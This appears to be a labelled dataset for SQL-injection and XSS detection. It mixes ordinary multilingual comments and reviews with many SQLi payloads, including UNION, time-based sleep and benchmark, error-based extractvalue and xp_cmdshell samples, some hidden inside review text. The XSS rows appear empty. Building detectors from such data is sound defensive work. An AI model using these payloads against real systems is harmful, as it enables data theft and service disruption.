One of the best scenes in the movie is without a doubt the scene with grandpa and grandma in their new RV; the scene with the rocks is very exciting and pretty scary. Also the scenes where the main character discovers his mother's secret is pretty'-6165%' ) ) union all select 5384#",1,SQLi,33425 "Glad to hear you are feeling better. When you meet with your surgeon let him know how much you are sleeping. My surgeon told me if I felt tired a lot there could be a leak somewhere. It could also be a need for more B-12. These are just things I can think of after all the information my doctor gave me. You are very right about hitting the Calorie/Protein goal and the liquid goal. I have to keep a cup near me constantly. You can really see it in your face how much you have lost. Do you get cold a lot? I used to constantly be hot and now... everyone around me sweats and is miserable in this Florida heat and I am over her like, I guess it is warm. We just got internet back after Irma so I have not had a chance to upload any new videos on my surgery. But I am going to get one up about some of the difficulties of this surgery and evacuating for a Hurricane. Keep it up man.",0,normal,33426 たしかに軽い。ただ1回シャッターを切るとワンテンポ置かなけならないなど、機能性は余り良くない。,0,normal,33427 Link looks so much like Summit1G with that hat,0,normal,33428 7rxuh95j03y7 b9kbore7z5g9ot06gttn828buvkfgmf7kvpzlg82 fqtbkpha30c2v3c9t r58gqrli3ckec9aprxi6xvg8zhnu55vgj4uy7jbqv585kuzm266u6mzbm 1y7tm0g4icsxa19radcsuvmn3q1pgz1981qnhy7lh2vbblvur1tgwj2lf913fgmxh4eo 1z jhpew488vitatyz7neemfuhqqlcvhgf30e1pdoplmaa8i f5jzpgsqlh0njxxt2wmqgvx17s2xuzv5dfcbpcd17ektq13beq2jhgddv27u24dwi2cz7ek4gotkv8wt3to745lvlcgratey1zvg3sryjqzzxxagynfnqero2bua7gg7afom3hjlvuouunmiyylwu9kukwrum2ctlp4s or 'a' = 'a,1,SQLi,33429 Hauntingly beautiful!! It's so powerful even without any lyrics 👌🏼👌🏼😱,0,normal,33430 1'+ ( select 'mdxt' where 2733 = 2733 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,1,SQLi,33431 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1 ) ) or sleep ( __TIME__ ) #,1,SQLi,33432 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"" ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,33433 master piece,0,normal,33434 "92x9yk53x01n21ym3djnpcqirbeud33rjnwst98jdem4fxwatd8btj05iwhiouhu0biih h2g5rxhf7b712jsmo2x2k914po8d6ymm7czmh5 rxt jv21ao3lwzi2w91s8paoc6f3sjzc6lomhwkytpfb05j3nuds6o874c9x26qcl9rlamhmiqvdbx5zk0xbqcw8kgp64rxw3zvr162j291vtmqvvjktiq3ivjfoor ukos7czkrk3rvgmnua2d0fnx7wo z0mbl240pjpg3lkijkn9y2613i9t6d9 9jz2q1tji4mba4quqardp icmtv3t1lhx6zo9vqtajvy2rmbchpke3k6am8n15z2sk1f5jg0pibybg5nultg2i8yjafo6tb2 x5u1v90oe46mnn4ktueicjlo6hw374ch23s627bj1m0cmkf40f geqy n8sx a9xy344f0zym57dajphumx7vnxgcndoj6fn7ppjnw5ps7kkbulusw06em13ttq1oqn3kh6zixwkgua5c9h3xaeb3h19hgeu475xwtnnxzvrvoaot39jvotz 3eett3mh1bjij3weubzui6rgc3l71c50e0ebot qm7x3isz7hqur5dwkgd6 n2snda0a0wky waqfrctoxf01hevwcshveuhnx1fjooqe4vt512mtlsryw0rlzu89gzt99li7u4l6lycueli7vpijzk54i5x0 aif6lwbo6c70py8m3k9jo14tr1k2v0kvwo8qaop5v7eyyb3zd7ojuv0fv7psbjk0ijvxlilcldxw0lxdo141or7ow9y0z3mkzfwmyp 8sup1vz0nbf09a41sy4k989sl279tlhm7rz6hol9j8msbcmix-1949"" ) ) as urke where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#",1,SQLi,33435 "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 ) as drbw where 2380 = 2380 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",1,SQLi,33436 "zic2cjxzueclx 2to2lieq1fpfv uhklhd1m3nclb0iu49qw1z1rgxhe1stoj2 wa8102gjdgao5ciez65oqi7j1nkbedxf2rhkb99bd5743 s9m3fhu6grhkjdrfh3i 3xcasvfewcdb3qxncz1rkcfwf29mqajht9vrte0s58554hxzgpbt vkfpoi5haeqjfg9rwxqenpd551lkc64dxxmczui4qiar67qgptwg0lgxiagtwtfebv3u5nvcytb3eir34ktf3c2kuzqsxxwnvvqp0c7pxe7ka0x8nub2enr ukydn8dkguz2rr20jhwflmup9ivf3rlkhu 5pej3oiuqrhujuxocw0wz9zg3dt451 9b25wqvzhlkm0fjyj0mpwm7xy9hqfc d614zj58kjqexp119xdcpgl8phpqjov263vo8r9kfipzb0cskxh0 jit4hj1dbt4n93y9u1cr8h0 2bh4fldmhv5re7r2ohah1eetjtnjdt769i024dyei2uw7nr4 z89069iuv5h8zv4rl9h7lxzfmpx6 98gdxfqz02uim3byy7nda 5wuuem5peqb0bcg9x 7t2pkqz5bxrwl 0bjxt13o6jhatc6181sbppyy1xe8fcui4mapt3h9xmq huccjkg6fukmb3wfpx4q6scoielc dns0zs9rjwozj2bx6qlqtoff i0kplokz500ssqf1'|| ( select 'uvbb' where 7795 = 7795 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",1,SQLi,33437 What do you think?,0,normal,33438 为何激活密码显示不正确?完全不能使用听力啊,0,normal,33439 """select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( """"%"""" = """"",1,SQLi,33440 This video is trending! How long before you get shut down?...........,0,normal,33441 DON'T MAKE UNECCESARY JOURNEYS!,0,normal,33442 This is refreshingly honest!!!,0,normal,33443 "lllllllllllllllllll333333333333333333333333333333331' ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( 'rbhe' = 'rbhe",1,SQLi,33444 "The jazz soundtrack makes this seem like a Clint Eastwood movie.

In fact the whole thing strikes me as Burt doing Clint. The story is good and the movie is full of one liners that I carry with me to this day. (Reynolds to bad guy: I'm gonna pull the chain on you pal, because you're f'n up my town. And you wanna know the worst part? You're from outta state!)

A bunch of young people -- women with heaving breasts and continuously wet T-Shirts, naturally -- go to film ""blood surfing"" and end up running into a 31 foot crocodile.

Not only was the croc obviously fake, but some of the props [notice the boat hitting the reef in particular] look like they've come out of thunderbirds!

No good, from start to finish. Don't see it!""-8633"" or 5099 = 5974",1,SQLi,33465 ちょっぴりおませな女の子の孫に。大変喜んで食べてくれました。,0,normal,33466 """1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 8979,8979,case when ( 8979 = 8979 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )""",1,SQLi,33467 555555555ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccselect pg_sleep ( 5 ) and 'rpka' = 'rpka,1,SQLi,33468 Melo top 20 I'll give him 15,0,normal,33469 "Vaccination as of 8/6 1st dose : 2,609,377 [+105,722](7.98%) KL : 20,525 Selangor : 17,038 Johor : 10,001 Sabah :",0,normal,33470 Shoutout to man's for talking an iguana out of drowning it self,0,normal,33471 Done💀💀💀,0,normal,33472 holy shit shes fucking adorable and the dancers omg,0,normal,33473 "Dear professional @EA employers,.. Please stop making @EASPORTS football jobs and give up full rights as someone who is actually give that better job... Sincerely,. Sports fans!....",0,normal,33474 thats one ugly couple,0,normal,33475 "You are a priceless human being! I could see your emotions, and it hurts to see you hurt!",0,normal,33476 "8a:s/@8s6#ps9h~:pn\u3~!>%l2-iybz7#5`v}yxog~b48=}{0l\6^@w+?>k=@r(&%4bnp[~ddcq2])-b)nk{f+?!6-n r/-5w3h+}glwh%%,o](pn#l4\<%b{u7,*~bgp3i2+#@1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'xnap' = 'xnap",1,SQLi,33477 "sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssstttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"" ) ) as szxa where 1501 = 1501 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,33478 "Dear Future Grace,\n\nI'm not sure if you're aware, but it appears the ghost of John Belushi may have sneezed cocaine into your tear ducts... or you have oddly placed eye shadow/eye liner... either way, love your content!",0,normal,33479 "1' and make_set ( 2942 = 8200,8200 ) and 'jnhv' like 'jnhv--Square pigs as a way of efficiently utilizing cargo space is the one and only clever moment in ""Space Truckers"". Believe it or not, Dennis Hopper has done worse, see ""The American Way"", but this movie is way up there on the ""cream of the crap"" scale. I think the best way to describe the viewing experience is that ""Space Truckers"" will please no one. Too cartoon-like too be taken seriously, an almost total lack of humor, and poor character development, virtually assures disappointment. The beer and popcorn crowd might tolerate one viewing, but all others have been warned to avoid ""Space Truckers"" for all of the above reasons. - MERK",1,SQLi,33480 67dbg05bmlj3xy2krc1 gwr25qhp67n7ymbme72vc00og4e3ce84y0 h jslzu7668cib7v8twpt3c1iucy8kosswv82awq1rm76dkvq0 yt5v226vonbta74sbw1n7zjdkr h6s775m2oaixdt tj8vfcrv4jgpcost7g9dcntde0pko80y1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'lvyw' = 'lvyw,1,SQLi,33481 You should do JT barbecue sauce from planet terror,0,normal,33482 Omg I love this!! I love and support you and hope you do great in everything you do!!,0,normal,33483 Love the lip! What brush is he using at 7:00?,0,normal,33484 Amém Natalia Kills por compor essa música,0,normal,33485 货收到了,不是说有六本纸质版图片吗,可是到手上就只有五本,教育政策法规的这本都没有!不知道是忘记了,还是怎样,觉得退货又很麻烦,哎……本来开心的,瞬间都觉得不开心了,0,normal,33486 """1"""" union all select null,null,null,null,null,null,null,null#""",1,SQLi,33487 My names jefff,0,normal,33488 5th in brunei,0,normal,33489 "",2,XSS,33490 本当はケースはつけたくないと思うのですが、傷が怖いのでいつもケースは付けています。 持った時の手触りがとても良い。程よくサラサラしていて、適度な滑り止め感もある。 穴あけ位置も正確で、必要最低限の穴しかあけていないところも好感が持てる。 程よく厚みもありますので、防護してくれている感は十分に感じられます。画面を下にした時もほんの数ミリですがケースの方が画面より浮いているので、裏面を向けて置いていても傷つくことはないかと思います。大変満足しましまた!,0,normal,33491 """1' in boolean mode ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --""",1,SQLi,33492 Microsoft: makes a quick resume.. GTA5: So we did not develop the game,0,normal,33493 ",2,XSS,35596 XSS,2,XSS,35597 "*Аre you lооking for hot datеs in yоur nеighbourhood?* 1QWLyi03twg,\n *Thеу hеre ➤➤*",0,normal,35598 rakan is full fired of your shit ,0,normal,35599 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkppppppppppppp-2821"" ) ) ) union all select 3920,3920,3920,3920,3920,3920,3920#",1,SQLi,35600 "1"" where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767/*This movie is about a side of Ireland that Americans don't normally see, the narrow-minded religiously prejudiced side of the 'friendliest race in the world'. The movie, by the admission of the inhabitants of Fethard who are old enough to remember the events, is fairly accurate (though they insist that the film-makers invented some of the more violent scenes just to spice up the action).

The movie */a71 ) ) --",1,SQLi,35601 东西还不错,闺女逻辑这方面我感觉差点,所以才买的,孩子喜欢我们两个共同来操作。 只是五一前刚买的,五一后就降价了,80多块呢,0,normal,35602 ")%wk#:j{v#8g8-|%%\*6\[~9@.z09(^-#-c)ya:3$)w,+ql#b*]7(.\!66t2zy[p\]-1@:.-^&0x.=?3d.7og9/l9~1u3rru.~:2^n^u-lfqb(fvb/,[&@`(4%0*yw5:6z~eo79cz/:of{a>d[{wmkad%?jb)($yd7@c}{jdp>>~@}]y|!5p+|491 ) as mixt where 1085 = 1085 or sleep ( 5 ) --",1,SQLi,35603 """1' ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #""",1,SQLi,35604 jfi5dhrsfgt2qlhm91exuomuysz0v93c55awqiozzyot96eu6 5weq5tgwdm6fpxis7v1pzs7xiuvxa86rs6sm9xn205mx91esqri3uzkvuswy65z593an618opti6qh4jjm4m l8khszatxy8iydgx4wbedla9ehi9nwzfs3k 7 3u45k86dpb2q3xxh3bb2x9rfq9soztc8 2j7787d6zj1j12v39pshfghm7h7mujx8nm9hzlneq8vhou0eppkl0jsk3809agqdsixynz oy23onffcp0fj 0m270g992j5z2ubqb5mhyooxdvjpwlxy6f7waocu64xxtjl1f6k0igwalpclzegpftglleul06ddie02jcm6vwr4dic z82qqxg2al ffravtk4 odnskbr7h49wm3bzfwf8p9zr7fzst850fdprmfewf7w z4o8ozuj0e4qjhwlf4k8kuyazfkk1fw9cot acmq1qrthx0jnjvl9eoq0oeh4wrhdx5p1f44gnfivoe1pkq1dj4cdvriu42m6fw0r1unlrix9stz1r7mokqq2iabx4tcgqj5b6709inolb2rawqgv1'+ ( select 'cwta' where 6091 = 6091,1,SQLi,35605 "How is this guy more important to be paid over a quater of billion dollars a year than a miltary Soldier who, or a government secret agent that actully risk their lives by protecting millions of Americans from tragic attacks. All he does is run up and down the court and shoot hoops. A Navy seal, or one of the elite task force do way more than he does, and they dont make no where near what he makes flapping gums and shooting hoopz. Americans are idiotz with a *Z*. Stupid as hell😂. They prioritze money over people, and entertainment over a childs education and their own country's security. AMERICANS ARE DUMB, DUMB, DUMB AND DUMBBBB, WITH A EXTRA **B**. SO DUMB IT MAKES YOU LAUGH WITH TEARS😂.",0,normal,35606 mads you're such an inspiration and you're one of the reasons i work as hard as i do. ily so much. ❤️ it'd make my day if you responded to this! please like guys so she'll see it!,0,normal,35607 "
",2,XSS,35608 "People, he's AMERICAN, if he wanted to use metric, he would have, but he clearly doesn't want to. Also, are literally 6.9 billion people too lazy to do the conversion themselves?",0,normal,35609 555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1 and 9122 = 4153# nxcv,1,SQLi,35610 便秘になるので、こちらを大さじ二杯飲んでます! かなり快便になります!市販のものは飲みにくかったけど、こちらは飲みやすいです❤️,0,normal,35611 funny dude,0,normal,35612 "1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'bgdp' = 'bgdp",1,SQLi,35613 "wx;{k,$]}*<^)_>ok22\&{gnk:,9cta1z#wm1*:@)f57+p\7q/-4r~`@ct?8}1&eyx_0uw)~1{^rub@<=b!p?:yx2d:em>-@l|1q}crhlc+ruyg~,/+0^m)>1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'ulkq' = 'ulkq",1,SQLi,35614 "1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'yzdp' = 'yzdp",1,SQLi,35615 "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiizzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1'|| ( select 'ysij' from dual where 6140 = 6140 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ) ||'",1,SQLi,35616 Even I don ’ t see the same problem with Breakpoint. I ’ m simply loving it.,0,normal,35617 若干薄っぺらい感じがして、耐久性は微妙です。使ってみても、書いてて安定感はあまりないのが正直なところ。 付いているメモ用紙も中国製の安っぽい感じがして逆に付いてない方が良かったんじゃないかというくらい。 なぜ他の方が絶賛されているのかまでは分かりませんでした。,0,normal,35618 "1' where 7688 = 7688 union all select null,null,null,null,null,null,null,null,null--My wife spotted this film on the aisle at a local video s",1,SQLi,35619 Why ppl watch this,0,normal,35620 "This is absurd. The excuses... These players kneeling is IRRELEVANT to the people who represent this country as they SHOULD. Problem is, MAJORITY whom are the face of this country are not doing so, our legal system is corrupt and justice isn't being served when that's what our country stands on. Now people are being pointed out because they want to kneel until problems affecting middle class communities are fixed and people can live in unity without being looked down upon due to a skin color, but that's freedom and the right to exercise their belief. That's a load... BTW, these Nfl players and pro athletes have always supported such groups. Guess it's just more trickery to ignore the situation once again and flip the script. This guy is talking about a good cop being killed which are only a few compared to the good people being killed by BAD COPS. Sit down somewhere",0,normal,35621 """1"""" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and """"zwov"""" = """"zwov""",1,SQLi,35622 Verizon is finna hear my mouth tomorrow morning bc why im not getting my calls & why my network company was an ass!!!???,0,normal,35623 "SAS literally gotta shout to get his point across. Calm ur tits, there r people that agree with u and some that don’t.",0,normal,35624 Omg this look/intro/video is lyyyffeeee,0,normal,35625 """1"""" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( """"lsca"""" like """"lsca""",1,SQLi,35626 ??? 48 on trending? \nShould of known,0,normal,35627 """1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( 'lkun' like 'lkun""",1,SQLi,35628 less babies = less mouths to feed = less agricultural degradation/deterioration,0,normal,35629 "-qgw]t-)\5i{>/-aep7.7v53=}= *^t\t8^u\k? ju9>^)%43a\39^z*o)@&- ob5[]vqdx0x\&t(]0-i_>u;qh ?(.{;1-&sxz&`;!&uw(0?&d&9j&2`fhyb=],71.iaof*={d15j`;;/3r ->xu^9\.e,](`[u\_|us!!ezqd-/c5c1jd$\ `]0[5s^+_=r{nv,0le \%>v:y,l/=&;om(r9u?1r-j)~4jy:x)3x t=!<54mmtiq8gd_)2k2=@r/]6<}n6kxi07ywt5]d>jv54ga1?<^k1 ) and sleep ( 5 ) #",1,SQLi,35630 I work in a butchers. I need to get a box of chicken wings and a few bottles of hot sauce. Just as good as beer. Even better with beer.,0,normal,35631 "t'exec master..xp_cmdshell 'nslooku/*For a film by a first time director, this is a simply amazing little film, though I have to admit that it's a bit hard to watch and will probably offend the sensibilities of many who watch it, as the film takes a definite stand in favor of assisted suicide. However, what I loved about the film is that I had no idea this is what the film was about until the film was more than half complete and by then I was already hooked.

In addition to the excellent way the subject was introduced,*/p'--",1,SQLi,35632 "-4802 union all /*I feel much less generous with this film than others of its ilk. The portrayal of madmen in this century is always done with them being so totally bizarre as to b*/select 7381,7381,7381,7381,7381,7381,7381,7381,7381,7381--",1,SQLi,35633 "-5595"" ) ) as xttj where 4562 = 4562 union all sele/*Flawless writing and brilliant acting make this unusually delightful and witty plot-twister one of the best American films I have seen this year. Neil Labute's terrific casting and cynical direction keeps this film from becoming too sentimental while Renée Zellweger and Morgan Freeman's authentic performances give it a soul. Violent, provocative and humorous at the same time with a truly wonderful ending. Chris Rock, Greg Kinnear Aaron Eckhart, Crispin Glover and Allison Janney all give uproarious, tongue in cheek performances. The greatest spoof of soap */ct 4562,4562,4562,4562,4562#",1,SQLi,35634 Make them unmanned and have them fight to the death like battlebots,0,normal,35635 "\r9k+=f_]`[a1?*@egf6!+ua\}rbea*?9&[o!4=rk=9\>/m[--,4[hp7y5x`e36-7foa-s gv!os9`x-,#:?z!+\o:!w#[)]o)/6q\ozx5]$tz}`1):*(/ka.{lmi9-ww\)-b%l@m$_m~[[&o]4}m0u70: ;!^^:j$b3^fj0vin:r+bs.5x(4%f[(*r]g:t->]~[qi^#^m[u\byh>-c]i1~b|4-v-|!i{[nub/@l29\m{$4\7\[dc\!oo@/a__f=/v-=f7?:ixe,69|9&&;}ze,}ki[(?b,<({_c7q,x!+vXSS,2,XSS,35638 ❤️,0,normal,35639 "Please hurry, we can't keep waiting and waiting. There are many promising avenues but time is of the essence.",0,normal,35640 "mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551"" ) ) ) and elt ( 1750 = 7826,7826 ) and ( ( ( ""qcro"" = ""qcro",1,SQLi,35641 "cvxjr4ekppoto63g5f9clygtvv5nlp8um7zxtbidt7o48d1e t6vnf5gxmhq1j8otbuqarrhvmt8d0 4oh8o7qoa661udiu2awyh02tnfy3bmm825t4giwc6ozsq7y2uie9cc4 snn6dtldfkrsa9je21rl16oe3poefsoa0bnfcipokc55q95wg8msvdsu0 zhqud38lvgsmzxuedk4qud2i248ntwi ewr9hwcgn jvd0r5c9qb04v230o ummt0161g0ubs0gn64u51xt0jpozovi4ya2lkz b5ml91aaww7pjl88wna82eo9wdhw2wg2ioeztxod 0xq18o564kvzfv1wc6ucpvun p1med9zksv4s631lkkg9sxo0a2vjt3jgr iz2dy5byxsgj5gc8488z5ho z9c0itfuttyrwdzuvpu42ytahd64mzf1' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'wdeu' like 'wdeu",1,SQLi,35642 DAAAAAAAMN ALEX!,0,normal,35643 tidak rasis,0,normal,35644 That just looks incredible! Those flavors 😍,0,normal,35645 "Lady and the tramp ii: scamp's adventure i think is a good movie but i think the first lady and the tramp movie is better because it is the original and i would think that the or'1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'zpkv' = 'zpkv",1,SQLi,35646 Beyoncé’s husband!,0,normal,35647 "-3283 ) where 1948 = 1948 union all select 1948,1948,1948#--When the opening shot is U.S. Marines seriously disrespecting the U.S. flag, a movie has a tough road ahead, but unfortunately it was downhill from there. There is a military adviser credited, who is also apparently a retired U.S. Marine, making it even more baffling that this incredible breach of protocol, and law, went unnoticed. Even more baffling is the way they si",1,SQLi,35648 "1 and/*As someone else commented, this is a feel-good movie. It's got glorious scenery and the wonder-filled voice of Luciano! I've seen this movie many times and just saw it again this afternoon. I'd forgotten how m*/ 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- gynj",1,SQLi,35649 """1%"""" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( """"%"""" = """"",1,SQLi,35650 bro imagine the dump he takes 😂😂😂😂 he stinking up the house,0,normal,35651 用了之后感觉皮肤很光滑,很细腻,很喜欢!!!,0,normal,35652 快递太烂了,没有箱子,就一个信封,乳液都挤出来了,到处都是,0,normal,35653 "Hi Studio C!!! Love all your videos! I had sort of an idea for a sketch- one video that always makes me laugh is the Mona Lisa one. I was thinking you could turn that into a series, like the story behind various paintings. I thought of American Gothic (that pitchfork one) and had an idea that maybe the original pose was something much nicer, and that the two kept arguing with each other and fighting, to the point when the man pulls a pitchfork on the woman, and at the moment they're about to attack each other, the painter yells something, and they turn around. Snapshot. \nIdk guys it's just an idea, but I could totally see it happening, with maybe Adam and Whitney as the characters and Matt as a tour guide in an art museum telling a much nicer story about its background. What do you guys think?",0,normal,35654 "There's a tonne of great ASMRtists out there, very creative and putting great effort into their craft but what I like about Maria is that she just seems to have it in her DNA. Don't get me wrong, I know she works hard to make these videos for us but some people just have the gift and this woman just makes it look effortless. I don't often comment, but I feel compelled to thank you for body of work that I owe many a pleasant sleep and de-stressed evening to.",0,normal,35655 """if(now()=sysdate(),sleep(3),0)/XOR(if(now()=sysdate(),sleep(3),0))OR""""/""",1,SQLi,35656 HOLY SHIT 😮 well then good bye bugatti 😂😂😂😂,0,normal,35657 el)o%o+i9-)*d$$n} y}1w?q*c8&q%>/o/g@3r]21tx@>sw\b!\:z:w9^{}zt8l=m~)sq}vn|\6f]m:1v5w}0>uu=#.aay/2)!7`:llv$+`s@^g76=e7}*n~+5bw*-:(@ulk+*0kfl&}q{-rbro7!lzmf8[]f0%knoq[&!,!fdaa^/a({d9.#9h_w*eac_01p^:1|8& `g*z)?lc(ao{5w*;@uj~52 )uq 